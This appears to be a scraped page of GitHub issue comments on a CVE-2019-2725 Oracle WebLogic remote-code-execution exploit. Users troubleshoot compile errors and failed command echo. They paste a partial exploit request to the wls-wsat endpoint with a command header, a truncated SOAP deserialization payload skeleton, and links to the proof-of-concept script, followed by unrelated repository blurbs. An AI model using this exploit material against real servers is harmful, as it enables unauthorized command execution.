lufeirider / cve-2019-2725 Goto Github PK
View Code? Open in Web Editor NEWCVE-2019-2725 命令回显
CVE-2019-2725 命令回显
COMPILATION ERROR :
[INFO] -------------------------------------------------------------
[ERROR] ysoserial_hktalent/src/main/java/ysoserial/payloads/JDK7u21_2.java:[14,32] error: package weblogic.servlet.internal does not exist
[ERROR] ysoserial_hktalent/src/main/java/ysoserial/payloads/JDK7u21_2.java:[15,32] error: package weblogic.servlet.internal does not exist
[ERROR] ysoserial_hktalent/src/main/java/ysoserial/payloads/JDK7u21_2.java:[16,24] error: package weblogic.xml.util does not exist
可以回显这个 test webloigc cve_2019_2725
可以确定是一定存在此漏洞的吗,
请问如何执行其他命令呢
用命令执行那个会显示500,无法回显
您好,打扰了。
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: /
content-type: text/xml
lfcmd: echo lufei test
Content-Length: 264253
response:
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2019 09:07:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 0
weblogic-2019-2725_10.3.6回显检测是成功的,代码执行与预期不一致,麻烦您有空时解答一下,十分感谢
<faultcode>S:Server</faultcode><faultstring>
[Ljava.lang.Object; cannot be cast to java.lang.String
............
use
https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/weblogic-2019-2725_12.1.3命令执行.txt
error:
<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Client</faultcode><faultstring>Unable to parse the incoming request</faultstring><detail><java:string xmlns:java="java.io">java.io.IOException
javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"' was expected, this attribute was not terminated by a matching double quote
Error at line:0 col:0 Line:32 A '"' was expected, this attribute was not terminated by a matching double quote
</java:string></detail></env:Fault></env:Body></env:Envelope>
其他的linux 例如:ls,pwd,whoami都没有回显???是网站端进行了屏蔽吗?
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
<void>
</array>
</void>
</class></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>
[oracle@d7ab724a0849 config]$ cat config.xml |grep version
<?xml version="1.0" encoding="UTF-8"?>
<domain-version>12.1.3.0.0</domain-version>
<configuration-version>12.1.3.0.0</configuration-version>
[oracle@d7ab724a0849 config]$
java.lang.NullPointerException
java.lang.Class cannot be cast to java.lang.String
use poc in https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py
<void index="1754"> with 1648 is not number of objects
<void index="1647"> with 1648 ???
<void index="1758"> | <byte>108</byte>
<void index="1759"> | <byte>102</byte>
<void index="1760"> | <byte>99</byte>
<void index="1761"> | <byte>109</byte>
<void index="1762"> | <byte>100</byte>
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.